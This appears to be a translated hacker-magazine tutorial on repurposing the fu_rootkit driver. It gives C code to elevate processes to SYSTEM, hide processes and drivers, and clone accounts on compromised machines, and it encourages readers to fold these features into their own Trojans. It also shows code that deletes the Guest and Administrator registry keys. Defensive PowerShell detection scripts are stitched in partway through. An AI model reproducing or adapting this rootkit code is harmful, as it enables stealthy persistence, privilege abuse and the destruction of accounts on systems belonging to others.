Unknown in purdah: a study of putting fu_rootkit to use
Source: Internet
Author: User
In November 2004 I published the article "A small tool that cleverly deletes the Guest/Administrator accounts". Many friends asked how the tool was written; in fact most of its code was copied from fu_rootkit. Since you liked it, and I have had plenty of ideas over the past few days, let me tell you how to fully tap into what Fu_rootkit can do!
First go to www.rootkit.com and download fu_rootkit. An earlier version had problems elevating process privileges under Windows 2000 Professional; the new version has fixed this. Fu_rootkit can fairly be called "raised in purdah, unknown to the world": compared with Hxdef and the AFX rootkit its fame is much smaller, but gold always shines in the end, so today we will let it shine!
Fu_rootkit is open source, written in C, and easy to port. My development environment is Windows 2000 + SP4 + VC 6.0. The Fu_rootkit main program consists of two parts: Fu.exe and Msdirectx.sys. Msdirectx.sys is the driver that accesses kernel memory directly, and Fu.exe is the corresponding user-mode application. Let's take a look at some of its features:
-pl                         Enumerate all running processes
-ph #PID                    Hide the process whose process identifier is PID
-pld                        Enumerate all loaded drivers
-phd DRIVER_NAME            Hide the specified driver
-pas #PID                   Elevate the process with identifier PID to SYSTEM privileges
-prl                        List the available privileges
-prs #PID #privilege_name   Grant the process with identifier PID the specified privilege
-pss #PID #account_name     Change the token SID of the process with identifier PID to the specified account
You can see that fu_rootkit can not only hide processes and drivers and change process tokens and SIDs, but can also enumerate processes and drivers that other rootkits hide with hook techniques. What we are going to do today is use Msdirectx.sys to build our own hacker toolset!
Privilege elevation
With privileges we can operate freely and make the computer do all sorts of things for us, so the first step is privilege elevation.
We know that process privileges can be elevated with the PSU tool. Fu_rootkit can elevate any process to SYSTEM privileges, not only other processes but also its own process (you will see how useful this feature is later in the article)!
Step one: load Msdirectx.sys
The specific code is in the InitDriver() function. You do not need to understand the code fully; just copy the function over and it works.
Step two: find the process PID
The code is as follows:
    const char DESTPROC[19] = "UserManager.exe";   // UserManager.exe is the process name of our own program
    AddPrivilege(SE_DEBUG_NAME);                    // give our process the debug privilege
    HANDLE hRemoteProcess = NULL;
    DWORD pid = ProcessToPid(DESTPROC);             // the PID here is our own process's PID
The ProcessToPid function is as follows:
    // Requires <windows.h> and <psapi.h>; link with psapi.lib
    // Converts a process name to its PID; returns 0 if no such process is found
    DWORD ProcessToPid(const char *InputProcessName)
    {
        DWORD aProcesses[1024], cbNeeded, cProcesses;
        unsigned int i;
        HANDLE hProcess = NULL;
        HMODULE hMod = NULL;
        char szProcessName[MAX_PATH] = "UnknownProcess";

        // Elevate our own process to the debug privilege so other processes can be opened
        AddPrivilege(SE_DEBUG_NAME);

        // Count the running processes; aProcesses[] receives the valid PIDs
        if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
        {
            return 0;
        }
        cProcesses = cbNeeded / sizeof(DWORD);

        // Walk every valid PID
        for (i = 0; i < cProcesses; i++)
        {
            // Open the process with this PID
            hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                   FALSE, aProcesses[i]);
            // Get the process name for this PID
            if (hProcess)
            {
                if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded))
                {
                    GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));
                    // Compare the name obtained with the name requested; return the PID if they match
                    if (!stricmp(szProcessName, InputProcessName))
                    {
                        CloseHandle(hProcess);
                        return aProcesses[i];
                    }
                }
                CloseHandle(hProcess);   // close every handle we opened (the original leaked these)
            } // end of if (hProcess)
        } // end of for

        // No process with that name was found
        return 0;
    }
Step three: elevate the process privileges to SYSTEM
The specific code is in the UpdateToSystem() function. After this, our process UserManager.exe has SYSTEM privileges.
Attack section
Once you have SYSTEM privileges on the broiler (the compromised machine), you will of course want to hide your backdoor process or driver, clone an account, leave a hidden account, and so on. Let's look at how to implement these features in a program.
1. Cloning an account
Didn't you envy the little Banyan CA tool and want to write one yourself? Issue 7 of Black Defense 2003 already covered this in "Cloning accounts in C". In general there are two ways to clone an account: one is to use a system service to read and write the SAM files, the other is to use a driver to elevate process privileges. We use the second approach here. In the "Cloning accounts in C" article, because the program did not have SYSTEM privileges, the registry had to be modified by hand before the SAM key could be operated on, which was cumbersome. Here, of course, there is no such problem: just copy the code over and paste it into our project.
2. Process hiding
Process hiding is an essential self-defense ability for Trojans and viruses, and one of fu_rootkit's most basic functions is hiding processes. First we need to know the PID or name of the process, and then we can hide it. The hiding code is as follows:
    DWORD HideProc(DWORD pid)   // pid is the PID of the process to hide
    {
        DWORD d_bytesRead;
        DWORD success;
        if (!Initialized)   // the driver must have been loaded by InitDriver() first
        {
            return ERROR_NOT_READY;
        }
        success = DeviceIoControl(gh_Device,
                                  IOCTL_ROOTKIT_HIDEME,
                                  (void *)&pid,
                                  sizeof(DWORD),
                                  NULL,
                                  0,
                                  &d_bytesRead,
                                  NULL);
        return success;
    }
If you want to find hidden processes you can use the RTDetector 0.62 tool, which Black Defense has introduced before.
3. Driver hiding
Hiding drivers? That is a rare sight. Experienced administrators usually use the Drivers.exe command to view loaded drivers (Drivers.exe can be found in the Windows 2000 Resource Kit).
Did you see Msdirectx.sys exposed there? Fu_rootkit can hide its own msdirectx.sys; the command is: "C:\fu.exe -phd msdirectx.sys". Of course this feature can also easily be ported to our program.
Defense section
Do not think that getting SYSTEM privileges with Fu_rootkit is only good for attack and useless for defense. A rootkit is in fact a "double-edged sword", and used appropriately it is also a good helper for defense. And as a rookie, defense of course comes first, so please read the defense chapter.
1. Viewing system users
Nowadays, open any hacker magazine and you often see "hidden accounts", "undying accounts" and the like, which frighten rookies like me, so I often stare blankly at User Management wondering whether something is wrong. Here we can use LPUSER_INFO_3 to read user information, including user name, full name, description, number of logons, logon rights and last logon time. The code is long but simple, so it is not posted here; those interested can look at the DWORD CUserManagerDlg::Useralle() function.
Of course, we can also enumerate the accounts directly from SAM\SAM\Domains\Account\Users\Names\ and compare them with the accounts read via LPUSER_INFO_3. That way you can find hidden accounts and bring the hidden and "undying" ones back to their original form, so that you see the accounts "clearly and plainly".
2. Deleting Guest
Let's look at how to delete the Guest user. After obtaining SYSTEM privileges, just delete the corresponding Guest and 000001F5 keys under the registry's SAM key and it is done!
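A defender-side cross-view check for a process hidden this way, added here as an example and not code from the article or from Fu_rootkit: FU unlinks the process from the kernel's active process list, which the enumeration API reads, but the process still exists in the kernel handle table, so OpenProcess() on its PID still succeeds (or fails with ACCESS_DENIED rather than INVALID_PARAMETER). The PID upper bound and the function name are assumptions.

```powershell
# Cross-view detection of a process missing from the API list (example, not article code).
# Assumption: PIDs on the host stay below $MaxPid; raise it on busy systems.
Add-Type -Namespace Win32 -Name Proc -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr h);
'@

function Find-UnlistedProcess {
    param([int]$MaxPid = 65536)
    # Vista and later; on Windows 2000/XP use PROCESS_QUERY_INFORMATION (0x0400) instead
    $PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
    $ERROR_ACCESS_DENIED = 5      # the object exists, we are just not allowed to open it
                                  # (ERROR_INVALID_PARAMETER, 87, means no such id: normal for unused PIDs)

    # View 1: what the enumeration API reports (this is the list a DKOM rootkit edits)
    $visible = @{ 0 = $true }     # System Idle Process
    Get-Process | ForEach-Object { $visible[$_.Id] = $true }

    # View 2: walk the handle table through OpenProcess(); PIDs are multiples of 4
    $suspects = @()
    for ($candidate = 4; $candidate -lt $MaxPid; $candidate += 4) {
        if ($visible.ContainsKey($candidate)) { continue }
        $h = [Win32.Proc]::OpenProcess($PROCESS_QUERY_LIMITED_INFORMATION, $false, [uint32]$candidate)
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        if ($h -ne [IntPtr]::Zero) {
            [void][Win32.Proc]::CloseHandle($h)
            $suspects += [pscustomobject]@{ Pid = $candidate; Reason = 'OpenProcess succeeded, PID not enumerated' }
        } elseif ($err -eq $ERROR_ACCESS_DENIED) {
            $suspects += [pscustomobject]@{ Pid = $candidate; Reason = 'ACCESS_DENIED on a PID not enumerated' }
        }
    }
    return $suspects
}

Find-UnlistedProcess | Format-Table -AutoSize
```

A process that starts or exits between the two views gives a transient hit, so confirm a suspect by re-running and by checking it from a second vantage point such as an offline boot.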
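The comparison just described, as an added example that is not the article's own code: the names recorded in the SAM hive are set against the names the account-management API returns (here via the WinNT ADSI provider, which wraps NetUserEnum), and the count of per-RID keys is compared with the count of names. It must run as SYSTEM, since Administrators cannot read HKLM\SAM by default; the function name is an assumption.

```powershell
# Cross-view check for accounts present in the SAM hive but absent from the account API
# (example, not the article's code). Run as SYSTEM: Administrators cannot read HKLM\SAM.
function Find-UnlistedSamAccount {
    $usersKey = 'HKLM:\SAM\SAM\Domains\Account\Users'

    # View 1: names recorded in the hive itself
    $samNames = @(Get-ChildItem -Path "$usersKey\Names" -ErrorAction Stop |
                  ForEach-Object { $_.PSChildName })
    # Every account also has a key named by its RID in hex (000001F5 is Guest, 000001F4 is Administrator)
    $ridKeys  = @(Get-ChildItem -Path $usersKey |
                  Where-Object { $_.PSChildName -ne 'Names' } |
                  ForEach-Object { $_.PSChildName })

    # View 2: what the account API reports, via the WinNT ADSI provider
    # (works on systems that predate Get-LocalUser)
    $apiNames = @(([ADSI]"WinNT://$env:COMPUTERNAME").Children |
                  Where-Object { $_.SchemaClassName -eq 'user' } |
                  ForEach-Object { $_.Name })

    $findings = @()
    foreach ($name in $samNames) {
        if ($apiNames -notcontains $name) {
            $findings += [pscustomobject]@{ Item = $name; Finding = 'in SAM Names key, not returned by the API' }
        }
    }
    foreach ($name in $apiNames) {
        if ($samNames -notcontains $name) {
            $findings += [pscustomobject]@{ Item = $name; Finding = 'returned by the API, no SAM Names key' }
        }
    }
    if ($ridKeys.Count -ne $samNames.Count) {
        $findings += [pscustomobject]@{ Item = "$($ridKeys.Count) RID keys / $($samNames.Count) names"
                                        Finding = 'RID key count differs from name count' }
    }
    return $findings
}

Find-UnlistedSamAccount | Format-Table -AutoSize
```

A cloned account (one whose RID key data was overwritten with another account's) keeps its own name and RID, so this name-level comparison does not catch it; that case needs the per-RID key contents inspected.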
    void CUserManagerDlg::DeleteGuest()
    {
        BOOL upResult;
        upResult = UpdateToSystem();
        // First check whether elevating our process to SYSTEM succeeded
        if (upResult)
        {
            // Delete the Guest user!
            BOOL dResult;
            dResult = DelNT(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names\\Guest");   // delete the Guest name key
            BOOL dResult2;
            dResult2 = DelNT(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\000001F5");      // delete the key for Guest's RID 000001F5
            if (dResult && dResult2)
            {
                AfxMessageBox("The Guest user was deleted successfully!");
            }
            else
            {
                AfxMessageBox("Deleting the Guest user failed!");
            }
        }
        else
        {
            AfxMessageBox("Elevating to SYSTEM privileges failed!");
        }
    }
where DelNT() is a function defined specifically to delete a registry subkey.
3. Deleting Administrator
Don't be startled by the title. Generally Administrator cannot be deleted; you can go to Control Panel -> Administrative Tools -> Computer Management to rename the account, or use the Passprop tool from the NT Resource Kit to enable lockout of the Administrator. Here we certainly have to push the limit: delete Administrator! The code is similar to the code for deleting Guest; just change the parameters and delete the Administrator key and the 000001F4 key under the registry's SAM key respectively. And it can be done while logged on as that very Administrator user, right? Heh. If that is your only administrator account, I am sorry, congratulations: there is no longer any administrator on the machine!
Tip: it is strongly recommended that you first create an administrator account with a different name before deleting Administrator! According to the Microsoft Information Security Anthology, deleting the built-in Administrator and Guest accounts could damage the SAM database, but the author of that anthology also stated that his tests showed no side effects.
4. Killing processes
Do you often encounter this situation: you find an unknown process in Task Manager and cannot kill it because your permissions are insufficient? Once we have SYSTEM privileges that is no longer a problem. Today's viruses and Trojans are double processes that watch each other, which makes process killing very inconvenient, so we need to be able to kill several processes at once. Choose the ListView control as the control for enumerating processes and enable its checkbox option so that several processes can be selected at the same time.
5. Enumerating processes and drivers hidden by hook techniques
This function is where Fu_rootkit truly excels: it can help you find processes and Trojans hidden with hook techniques. The implementation is relatively simple; look at the ListProc(void *buffer, int buff_size) and ListDriv(void) functions in the source.
This article used Fu_rootkit to obtain SYSTEM privileges and complete a number of practical little hacker tools. SYSTEM and Administrator privileges look about the same in general, but in some details of interaction with the system kernel you can see that SYSTEM privileges are greater, for example certain keys in the registry, the ability to read and write physical memory, and so on. So what you can do after getting SYSTEM privileges is far more than what we have described above, and I hope we can all dig into it together.
http://www.rootkit.com/ has a lot of good open source; researching it and extending its functionality can produce many useful little programs. Adding its functions to our own pony (little Trojan) will greatly enhance its vitality. Friends, don't you now feel that anyone can write hacker software? If so, my painstaking effort was not wasted. Because of work my time is really limited, so it is impossible to implement every one of the functions above in code, but the framework is already in place and many functions only need the code copied in. The delete Guest/Administrator gadget and the Fu_rootkit code are attached; if you upgrade it, please send it to me!